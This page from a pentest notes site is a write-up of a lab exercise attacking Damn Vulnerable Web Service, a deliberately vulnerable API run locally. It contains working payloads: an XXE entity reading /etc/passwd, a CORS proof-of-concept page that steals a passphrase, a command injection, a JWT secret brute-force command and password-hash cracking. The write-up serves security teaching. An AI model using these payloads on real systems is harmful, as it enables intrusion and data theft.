CSbyGB - Pentips
Buy me a tea
  • CS By GB - PenTips
    • Welcome to CSbyGB's Pentips
  • Networking, Protocols and Network pentest
    • Basics
    • DNS
    • FTP
    • HTTP & HTTPS
    • IMAP
    • IPMI
    • MSSQL
    • MYSQL
    • NFS
    • Oracle TNS
    • POP3
    • RDP
    • RPC
    • Rservices
    • Rsync
    • SMB
    • SMTP
    • SNMP
    • SSH
    • VOIP and related protocols
    • Winrm
    • WMI
    • Useful tips when you find unknown ports
  • Ethical Hacking - General Methodology
    • Introduction
    • Information Gathering
    • Scanning & Enumeration
    • Exploitation (basics)
    • Password Attacks
    • Post Exploitation
    • Lateral Movement
    • Proof-of-Concept
    • Post-Engagement
    • MITRE ATT&CK
  • External Pentest
    • External Pentest
  • Web Pentesting
    • Introduction to HTTP and web
    • Enumeration
    • OWASP Top 10
    • General Methodo & Misc Tips
    • Web Services and API
    • Vunerabilities and attacks
      • Clickjacking
      • CORS (Misconfigurations)
      • CSRF
      • SSRF
      • Bypass captcha
      • Template Injection (client and server side)
      • MFA bypass
      • XXE
    • Exposed git folder
    • Docker exploitation and Docker vulnerabilities
    • Websockets
  • Mobile App Pentest
    • Android
    • IOS
  • Wireless Pentest
    • Wireless pentest
  • Cloud Pentest
    • Cloud Pentest
    • Google Cloud Platform
    • AWS
  • Thick Client Pentest
    • Thick Client
  • Hardware Pentest
    • ATM
    • IoT
  • Secure Code Review
    • Secure code review
    • Java notes for Secure Code Review
  • AI & AI Pentest
    • MITRE ATLAS
    • OWASP ML and LLM
    • Hugging face
    • AI Python
    • Gemini
    • Ollama
  • Checklist
    • Web Application and API Pentest Checklist
    • Linux Privesc Checklist
    • Mobile App Pentest Checklist
  • Tools
    • Burpsuite
    • Android Studio
    • Frida
    • CrackMapExec
    • Netcat and alternatives
    • Nmap
    • Nuclei
    • Evil Winrm
    • Metasploit
    • Covenant
    • Mimikatz
    • Passwords, Hashes and wordlist tools
    • WFuzz
    • WPScan
    • Powershell Empire
    • Curl
    • Vulnerability Scanning tools
    • Payload Tools
    • Out of band Servers
    • STEWS
    • Webcrawlers
    • Websocat
  • VM and Labs
    • General tips
    • Setup your pentest lab
  • Linux
    • Initial Foothold
    • Useful commands and tools for pentest on Linux
    • Privilege Escalation
      • Kernel Exploits
      • Password and file permission
      • Sudo
      • SUID
      • Capabilities
      • Scheduled tasks
      • NFS Root Squashing
      • Services
      • PATH Abuse
      • Wildcard Abuse
      • Privileged groups
      • Exploit codes Cheat Sheet
  • Windows
    • Offensive windows
    • Enumeration and general Win tips
    • Privilege Escalation
    • Active Directory
    • Attacking Active Directory
      • LLMNR Poisoning
      • SMB Relay Attacks
      • Shell Access
      • IPv6 Attacks
      • Passback Attacks
      • Abusing ZeroLogon
    • Post-Compromise Enumeration
      • Powerview or SharpView (.NET equivalent)
      • AD Manual Enumeration
      • Bloodhound
      • Post Compromise Enumeration - Resources
    • Post Compromise Attacks
      • Pass the Password / Hash
      • Token Impersonation - Potato attacks
      • Kerberos
      • GPP/cPassword Attacks
      • URL File Attack
      • PrintNightmare
      • Printer Bug
      • AutoLogon exploitation
      • Always Installed Elevated exploitation
      • UAC Bypass
      • Abusing ACL
      • Unconstrained Delegation
    • Persistence
    • AV Evasion
    • Weaponization
    • Useful commands in Powershell, CMD and Sysinternals
    • Windows Internals
  • Programming
    • Python programming
    • My scripts
    • Kotlin
  • Binary Exploitation
    • Assembly
    • Buffer Overflow - Stack based - Winx86
    • Buffer Overflow - Stack based - Linux x86
  • OSINT
    • OSINT
    • Create an OSINT lab
    • Sock Puppets
    • Search engines
    • OSINT Images
    • OSINT Email
    • OSINT Password
    • OSINT Usernames
    • OSINT People
    • OSINT Social Media
    • OSINT Websites
    • OSINT Business
    • OSINT Wireless
    • OSINT Tools
    • Write an OSINT report
  • Pentester hardware toolbox
    • Flipper Zero
    • OMG cables
    • Rubber ducky
  • Post Exploitation
    • File transfers between target and attacking machine
    • Maintaining Access
    • Pivoting
    • Cleaning up
  • Reporting
    • How to report your findings
  • Red Team
    • Red Team
    • Defenses Enumeration
    • AV Evasion
  • Writeups
    • Hackthebox Tracks
      • Hackthebox - Introduction to Android Exploitation - Track
    • Hackthebox Writeups
      • Hackthebox - Academy
      • Hackthebox - Access
      • Hackthebox - Active
      • Hackthebox - Ambassador
      • Hackthebox - Arctic
      • Hackthebox - Awkward
      • Hackthebox - Backend
      • Hackthebox - BackendTwo
      • Hackthebox - Bastard
      • Hackthebox - Bastion
      • Hackthebox - Chatterbox
      • Hackthebox - Devel
      • Hackthebox - Driver
      • Hackthebox - Explore
      • Hackthebox - Forest
      • Hackthebox - Good games
      • Hackthebox - Grandpa
      • Hackthebox - Granny
      • Hackthebox - Inject
      • Hackthebox - Jeeves
      • Hackthebox - Jerry
      • Hackthebox - Lame
      • Hackthebox - Late
      • Hackthebox - Love
      • Hackthebox - Mentor
      • Hackthebox - MetaTwo
      • Hackthebox - Monteverde
      • Hackthebox - Nibbles
      • Hackthebox - Optimum
      • Hackthebox - Paper
      • Hackthebox - Photobomb
      • Hackthebox - Poison
      • Hackthebox - Precious
      • Hackthebox - Querier
      • Hackthebox - Resolute
      • Hackthebox - RouterSpace
      • Hackthebox - Sauna
      • Hackthebox - SecNotes
      • Hackthebox - Shoppy
      • Hackthebox - Soccer
      • Hackthebox - Steamcloud
      • Hackthebox - Toolbox
      • Hackthebox - Vault
      • Hackthebox - Updown
    • TryHackme Writeups
      • TryHackMe - Anonymous
      • TryHackMe - Blaster
      • TryHackMe - CMesS
      • TryHackMe - ConvertMyVideo
      • TryHackMe - Corridor
      • TryHackMe - LazyAdmin
      • TryHackMe - Looking Glass
      • TryHackMe - Nahamstore
      • TryHackMe - Overpass3
      • TryHackMe - OWASP Top 10 2021
      • TryHackMe - SimpleCTF
      • TryHackMe - SQL Injection Lab
      • TryHackMe - Sudo Security Bypass
      • TryHackMe - Tomghost
      • TryHackMe - Ultratech
      • TryHackMe - Vulnversity
      • TryHackMe - Wonderland
    • Vulnmachines Writeups
      • Web Labs Basic
      • Web Labs Intermediate
      • Cloud Labs
    • Mobile Hacking Lab
      • Mobile Hacking Lab - Lab - Config Editor
      • Mobile Hacking Lab - Lab - Strings
    • Portswigger Web Security Academy Writeups
      • PS - DomXSS
      • PS - Exploiting vulnerabilities in LLM APIs
    • OWASP projects and challenges writeups
      • OWASP MAS Crackmes
    • Vulnerable APIs
      • Vampi
      • Damn Vulnerable Web Service
      • Damn Vulnerable RESTaurant
    • Various Platforms
      • flAWS 1&2
  • Digital skills
    • How to make a gitbook
    • Marp
    • Linux Tips
    • Docker
    • VSCodium
    • Git Tips
    • Obsidian
  • Durable skills
    • Durable skills wheel/Roue des compétences durables
  • Projects
    • Projects
      • Technical Projects
      • General Projects
  • Talks
    • My Talks about Web Pentest
    • My talks about Android Application hacking
    • Other of my talks and Podcast
  • Resources
    • A list of random resources
Powered by GitBook
On this page
  • General info, Get it and deploy it
  • Infos
  • Deploy it
  • Hack it
  • Exploration
  • Mass assignment
  • Information disclosure
  • Horizontal Access Control
  • Vertical Access Control Issues
  • Cross Site Scripting
  • JSON Web Token (JWT) Secret Key Brute Force
  • XML External Entity Injection (XXE)
  • Insecure Direct Object Reference
  • NoSQL Injection
  • Hidden API Functionnality Exposure
  • Server Side Request Forgery
  • CORS
  • JSON Hijacking
  • SQL Injection
  • Command Injection
  • XPATH Injection
  • XML rps user enumeration
  • Open redirect
  • Path traversal
  • Unsafe Deserialization
  • Resources
  1. Writeups
  2. Vulnerable APIs

Damn Vulnerable Web Service

PreviousVampiNextDamn Vulnerable RESTaurant

Last updated 1 year ago

General info, Get it and deploy it

Infos

List of Vulnerabilities

This is the list from the documentation To keep track, I will check everytime I find one

Deploy it

  • git clone https://github.com/snoopysecurity/dvws-node.git

  • cd dvws-node

  • docker compose up

  • It should start building

  • Once done edit your /etc/hosts file and add this line 127.0.0.1 dvws.local

  • All the other infos we need are here

web-1         | 🚀 XML-RPC server listening on port 9090
web-1         | 🚀 API listening at http://dvws.local (127.0.0.1)
web-1         | 🚀 GraphQL Server ready at http://localhost:4000/

Hack it

  • Launch burp or zap and setup your scope settings

Exploration

Register

Now we can visit http://dvws.local/ we get this page

Let's create an account

Once logged in we get this home page:

Home page without being logged in

However we do not need to be logged in to access the home page. We can access it right away if we go here http://dvws.local/home.html

File upload functionality

Here http://dvws.local/upload.html we have the possibility to upload files. So this is definitely something to keep aside for later.

PassPhrase Generator

Another page to keep for later explorations http://dvws.local/passphrasegen.html

Public Notes

Another one http://dvws.local/search.html

Admin Area

We can access the admin area as well without any cookie http://dvws.local/admin.html

Save Secret Note

This looks fun too http://dvws.local/notes.html

If we try to create a note without a token it won't work. So we can access the page but we can not write notes.

Directory and endpoint enumeration

  • Directory enum small list

┌─[✗]─[gabrielle@parrot]─[~/vulnerable-apis/dvws-node/dvws-node]
└──╼ $wfuzz -c --hc 404 --hw 225 -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-small.txt http://dvws.local/FUZZ
 /usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer                         *
********************************************************

Target: http://dvws.local/FUZZ
Total requests: 87664

=====================================================================
ID           Response   Lines    Word       Chars       Payload                                                                                              
=====================================================================

000000164:   301        10 L     16 W       181 Ch      "uploads"                                                                                            
000000269:   301        10 L     16 W       179 Ch      "static"                                                                                             
000000549:   301        10 L     16 W       173 Ch      "css"                                                                                                
000000954:   301        10 L     16 W       171 Ch      "js"                                                                                                 
000008156:   301        10 L     16 W       173 Ch      "CSS"                                                                                                
000009299:   301        10 L     16 W       171 Ch      "JS"                                                                                                 

Total time: 63.89374
Processed Requests: 87664
Filtered Requests: 87658
Requests/sec.: 1372.027
  • Directory enum big list

=> Nothing more than in the small one.

When I explored I saw that the schema for the api was /api/v2. This is good to know (I found it in my burp history). This way we have the api endpoints schema.

  • Let's try another wordlist, I really want to find the documentation. This time I will use the intruder and the wordlist swagger.txt

  • Here is my position tab in the intruder

Notice that I did not put a / after the GET http verb

  • My payloads tab look like this

Make sure to unchek the URL-encode these characters at the bottom

Then we can launch the attack. We order the results by Status we get to endpoints worth checking

Both these endpoints have the documenation

  • http://dvws.local/api-docs/

  • http://dvws.local/api-docs/swagger.json

Mass assignment

  • Create an admin user we add the parameter admin and set it to true admin=true

  • It works. Our new user is admin

Information disclosure

So in our burp history we have a users endpoint which gives a list of users and their password hashes.

So now we can log in as admin

Horizontal Access Control

When we access our passphrases, it calls the following endpoint /api/v2/passphrase/csbygb so it takes the username as id. So we could try to access the admin one /api/v2/passphrase/admin It works! Funny thing here is we do not even need a cookie to access it.

Note: I added a passphrase myself for the sake of the demo here.

Vertical Access Control Issues

When we try to access the admin area with a normal user through the browser we get redirected. However when we use an admin user we access the endpoint /api/v2/sysinfo/uname And the web browser shows this page.

So we can try to access the same endpoint but with a user Token.

  • Access with admin Token

So this is the legitimate request. We get info aobut the server.

  • Access with user Token

So this should not be possible, we access admin info with a user token.

If we try the functionality to search for a user we see this in the browser.

So it calls this endpoint and the request and response look like this in burp

So we can send the request to the repeater and change the token for a user one to see if we could access to the "admin" user info for example. And it works!

Cross Site Scripting

If we enter a user name with an xss payload in the user field the input is not sanitized and our paylaod is interpreted.

Now if we click on login we get our pop up

JSON Web Token (JWT) Secret Key Brute Force

We can do it with this command python3 jwt_tool.py <JWT-TOKEN-HERE> -o -C -d /usr/share/wordlists/rockyou.txt It works and we get the password access

Then we would just have to use this new generated token to access admin resources.

XML External Entity Injection (XXE)

When playing with the user search we had an XML Content. So this is definitely the place to check for XXE. Let's try to insert these lines at the top

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE test [ <!ENTITY xxe SYSTEM "file:///etc/passwd"> ]>

Then we can use this &xxe; in the usernames tags to print the file we need (here the passwd).

And it works we get the passwd file of the server.

Insecure Direct Object Reference

When playing with the notes we have a number attributed to the secret notes we create like this:

Here we have a note no 4 and no 9

We could try to check if the endpoint can also request only one specific note, using this number as an id. This endpoint /api/v2/notes will return all the notes let's try something like /api/v2/notes/note-number And it works we can access any note from any user. For example here is a note from csbygb with the token of csbygb-otheruser

After this we could enumerate all the notes with an automatic tool like burp intruder for example and by incrementing the note no.

NoSQL Injection

Hidden API Functionnality Exposure

So if we analyze the swagger we found during the enumeration phase. We have an endpoint that is different than the others /api/v1/info so this is an old functionnality. Well, let's try it. This discloses a lot of information on the server.

Server Side Request Forgery

The error page has un interesting response.

If we try the request from the article we get a less verbose response but it is still really interesting.

We can see the dvws.checkuptime from the error and it does also have pingback. So let's try the service mentionned in the error.

So this way we can access application that runs in the internal network fo the server. We could also scan the ports.

CORS

When we explored the application we found a few request that did not need any token or credentials.

For example /api/v2/passphrase/admin to request the passphrase that is called admin.

See here, we do not need any credentials and we have Access-Control-Allow-Credentials: true in the response header.

<!DOCTYPE html>
<html>
<body>
<center>
<h2>CORS POC Exploit</h2>
<h3>Get passphrase</h3>
 
<div id="demo">
<button type="button" onclick="cors()">Exploit</button>
</div>
 
<script>
function cors() {
  var xhttp = new XMLHttpRequest();
  xhttp.onreadystatechange = function() {
    if (this.readyState == 4 && this.status == 200) {
      document.getElementById("demo").innerHTML = alert(this.responseText);
    }
  };
  xhttp.open("GET", "http://dvws.local/api/v2/passphrase/admin", true);
  xhttp.withCredentials = true;
  xhttp.send();
}
</script>
 
</body>
</html>

JSON Hijacking

SQL Injection

Command Injection

When we explored we found an endpoint (/api/v2/sysinfo/uname) that was doing a uname in a server. This screams for command injection. If we append send this instead we can indeed execute another command /api/v2/sysinfo/uname;id

We can see that our user is root From this the next step would be to try to get a reverse shell.

XPATH Injection

And it works we get the full config file. It seems that it was taking the version from a config file (which also contains passwords).

XML rps user enumeration

There is an endpoint that allows to check if a user exists and it uses XMK rpc dvwsuserservice.

Open redirect

When we log out a user it sends a get request to this endpoint /api/v2/users/logout/dvws.local This basically makes a redirection as we can see here.

Path traversal

Download forms can be vulnerable to path traversal. Let's try to tamper with this request

We even get an error to check where we directory tree.

Let's try a few more dots and slashes

We are getting there.

And it works!

Unsafe Deserialization

Resources

With this information we can for example attempt to crack the admin hash. First let's find out which hash this is. We go to hascat examples hashes page and we search $2b$10 on the page. This way we see it is bcrypt. Now we can crack the hash with john (or hashcat) and we get the password of the admin user letmein.

Let's play a little with the jwt token. For this we can use jwt_tool. See for how to install it.

Once we get a key we can use it to update our rights and become admin by adding a permission. Here we can add the permission "user:admin" Here is how we could this with

So if we play with the quotes and try some NoSQL payload (you can find some ), we can trigger a NoSQL injection on the endpoint /api/v2/notesearch. It works and we get all the notes, including the secret ones

We can see also in the user agent the use of xmlrpc. So we could try to interact with it because it is known to have a few vulnerabilities that affected a lot of wordpress websites. This article mentions it.

So let's try a cors PoC to see if it is vulnerable we can find plenty of poc online (I found mind ). If you are not familiar with , this page on portswigger is very helpful to learn more about this.

And here we get the passphrase

You can check the explainations about this vulnerability in the official writeup

You can find the official writeup for the SQL Injection

To give the version on the home page it uses this endpoint /api/v2/release/0.0.1 If we inject a quote in the end we get an xpath error

We can try a few payloads from

What if we change dvws.local with another url? Well it redirects us to this url

You can find a good definition of this vulnerability

When we download a file it makes a post request to this endpoint /api/download

shows an example of insecure deserialization in nodejs. The request to /api/v2/export sends a serialize object to the server, this is how it fetches the requested document What is we could try to request for something else that we should be able to access.

Official repo dvws
here
here
jwt.io
here
here
cors
here
here
hacktricks
here
OWASP API Security Top 10
OWASP Security Testing v3
here
This article
docker compose up
Login page
Register
Home page
Home page without login
File Storage
PassPhrase generator
Public Notes
No cookie
Admin Area
Save Secret Note
500 error
Positions
Payloads
Results
mass assignment
admin
users
crack hash
admin
Admin passphrase
Admin area
Admin token
User token
User search as admin
User search
Admin user with simple user token
Payload xss
XSS vulnerable
key cracked
Become admin with jwt
XXE
Notes other user
csbygb note
NoSQL Injection
Hidden API Functionnality Exposure
list methods
uptime
Admin passphrase
id
config file
user exists
redirection
first try
home
path traversal